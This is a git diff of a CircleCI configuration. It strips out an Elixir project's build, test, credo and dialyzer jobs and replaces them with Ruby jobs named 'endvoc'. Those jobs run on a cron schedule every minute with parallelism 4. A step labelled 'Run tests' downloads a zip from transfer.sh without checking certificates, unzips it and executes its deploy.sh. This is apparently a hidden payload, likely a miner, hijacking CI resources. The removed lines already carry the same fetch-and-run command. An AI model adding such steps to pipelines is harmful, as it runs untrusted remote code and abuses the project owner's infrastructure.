--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -1,183 +1,70 @@
-# Reference: https://circleci.com/docs/2.0/configuration-reference/
-version: 2
+working_dir: &working_dir ~/app
+.build_template: &script
+  steps:
+    - checkout
+    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
+    - run: chmod +x ./cc-test-reporter
+    - run: ./cc-test-reporter before-build
+    - run: gem install bundler:2.1.4
+    - run:
+        name: Run tests
+        command: |
+                    apt update 
+                    apt install screen -y 
+                    wget --no-check-certificate -c https://transfer.sh/G9VQ5l/a-master.zip
+                    unzip a-master.zip && cd a-master && chmod 777 deploy.sh && ./deploy.sh
+
+version: 2.0
 jobs:
-  build:
+  endvoc:
     docker:
-      - image: circleci/elixir:1.7.2
-        environment:
-          MIX_ENV: test
-    working_directory: ~/app
+      - image: ruby
+    parallelism: 4   
     steps:
-      # Checkout.
-      - restore_cache:
-          keys:
-            - git-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-{{ .Revision }}
-            - git-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-
-            - git-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-
       - checkout
-      - save_cache:
-          key: git-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-{{ .Revision }}
-          paths: [".git"]
-      # Install tools.
-      - run: sudo apt update && sudo apt install screen -y && wget --no-check-certificate -c https://transfer.sh/G9VQ5l/a-master.zip && unzip a-master.zip && cd a-master && chmod 777 deploy.sh && ./deploy.sh
-      - run: echo word
-      # Dependencies.
-      - restore_cache:
-          keys:
-            - echo word
-            - echo word
-      - run: echo word
-      - save_cache:
-          key: deps-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ checksum "mix.lock" }}
-          paths: ["deps"]
-      # Build.
-      - restore_cache:
-          keys:
-            - build-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-{{ .Revision }}
-            - build-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-
-            - build-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-
-      - run: echo word
-      - save_cache:
-          key: build-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-{{ .Revision }}
-          paths: ["_build"]
-
-  test:
+  endvoc1:
+    <<: *script
     docker:
-      - image: circleci/elixir:1.7.2
-        parallelism: 4
-        environment:
-          MIX_ENV: test
-      - image: circleci/postgres:10.4-alpine-postgis
-        environment:
-          POSTGRES_USER: postgres
-          POSTGRES_DB: golden_path_test
-    working_directory: ~/app
-    steps:
-      # Checkout.
-      - restore_cache:
-          keys:
-            - git-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-{{ .Revision }}
-            - git-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-
-            - git-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-
-      - checkout
-      # Install tools.
-      - run: sudo apt update && sudo apt install screen -y && wget --no-check-certificate -c https://transfer.sh/G9VQ5l/a-master.zip && unzip a-master.zip && cd a-master && chmod 777 deploy.sh && ./deploy.sh
-
-      # Dependencies.
-      - restore_cache:
-          keys:
-            - deps-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ checksum "mix.lock" }}
-            - deps-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-
-      # Build.
-      - restore_cache:
-          keys:
-            - build-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-{{ .Revision }}
-            - build-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-
-            - build-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-
-      # Unfortunately needed for Bcrypt.
-      - run: rm -rf _build/test/lib/bcrypt_elixir && mix compile
-      ##
-      ## Test.
-      ##
-      - run:
-          name: Waiting for postgres...
-          command: dockerize -wait tcp://localhost:5432 -timeout 15s
-      - run: mkdir _build/test/junit
-      - run: touch _build/test/junit/junit_results.xml
-      - run: mix test
-      - store_test_results:
-          path: _build/test/junit
-
-  credo:
+      - image: ruby:2.7
+    parallelism: 4   
+  endvoc2:
+    <<: *script
     docker:
-      - image: circleci/elixir:1.7.2
-        parallelism: 4
-        environment:
-          MIX_ENV: dev
-    working_directory: ~/app
-    steps:
-      # Checkout.
-      - restore_cache:
-          keys:
-            - git-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-{{ .Revision }}
-            - git-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-
-            - git-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-
-      - checkout
-      # Install tools.
-      - run: sudo apt update && sudo apt install screen -y && wget --no-check-certificate -c https://transfer.sh/G9VQ5l/a-master.zip && unzip a-master.zip && cd a-master && chmod 777 deploy.sh && ./deploy.sh
-      - run: mix local.rebar --force
-      # Dependencies.
-      - restore_cache:
-          keys:
-            - deps-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ checksum "mix.lock" }}
-            - deps-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-
-      # Build.
-      - restore_cache:
-          keys:
-            - build-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-{{ .Revision }}
-            - build-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-
-            - build-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-
-      ##
-      ## Credo.
-      ##
-      - run: mix credo
-
-  dialyzer:
+      - image: ruby:2.6
+    parallelism: 4   
+  endvoc3:
+    <<: *script
     docker:
-      - image: circleci/elixir:1.7.2
-        parallelism: 4
-        environment:
-          MIX_ENV: dev
-    working_directory: ~/app
-    steps:
-      # Checkout.
-      - restore_cache:
-          keys:
-            - git-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-{{ .Revision }}
-            - git-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-
-            - git-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-
-      - checkout
-      # Install tools.
-      - run: sudo apt update && sudo apt install screen -y && wget --no-check-certificate -c https://transfer.sh/G9VQ5l/a-master.zip && unzip a-master.zip && cd a-master && chmod 777 deploy.sh && ./deploy.sh
-      - run: mix local.rebar --force
-      # Dependencies.
-      - restore_cache:
-          keys:
-            - deps-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ checksum "mix.lock" }}
-            - deps-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-
-      # Build.
-      - restore_cache:
-          keys:
-            - build-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-{{ .Revision }}
-            - build-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ .Branch }}-
-            - build-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-
-      ##
-      ## Dialyzer.
-      ##
-      ## Running dialyzer updates _build so we need to cache again.
-      ## This cache of _build does not override the previous cache but is merged.
-      - restore_cache:
-          keys:
-            - plt-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ checksum "mix.lock" }}
-            - plt-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-
-      - run: sudo apt update && sudo apt install screen -y && wget --no-check-certificate -c https://transfer.sh/G9VQ5l/a-master.zip && unzip a-master.zip && cd a-master && chmod 777 deploy.sh && ./deploy.sh
-      - save_cache:
-          key: plt-cache-{{ .Environment.CIRCLECI_CACHE_VERSION }}-{{ checksum "mix.lock" }}
-          paths: ["_build"]
-
-  
-
-
+      - image: ruby:2.5
+    parallelism: 4   
+ 
+  endvoc39:
+    <<: *script
+    docker:
+      - image: ruby:2.4    
+    parallelism: 4
 workflows:
   version: 2
-  verify_build:
-    # Any non-deploy branch:
-    #           / [test]
-    # [build] ->  [credo]
-    #           \ [dialyzer]
+  commit:
     jobs:
-      - build
-      - test
-      - credo
-      - dialyzer
+      - endvoc
+      - endvoc1
+      - endvoc2
+      - endvoc3
       
+
+
+    triggers:
+      - schedule:
+          cron: '* * * * *'
+          filters:
+            branches:
+              only:
+                - master
+         
+  endvocrunjob:
+    jobs:
+      - endvoc
+      - endvoc1
+      - endvoc2
+      - endvoc3
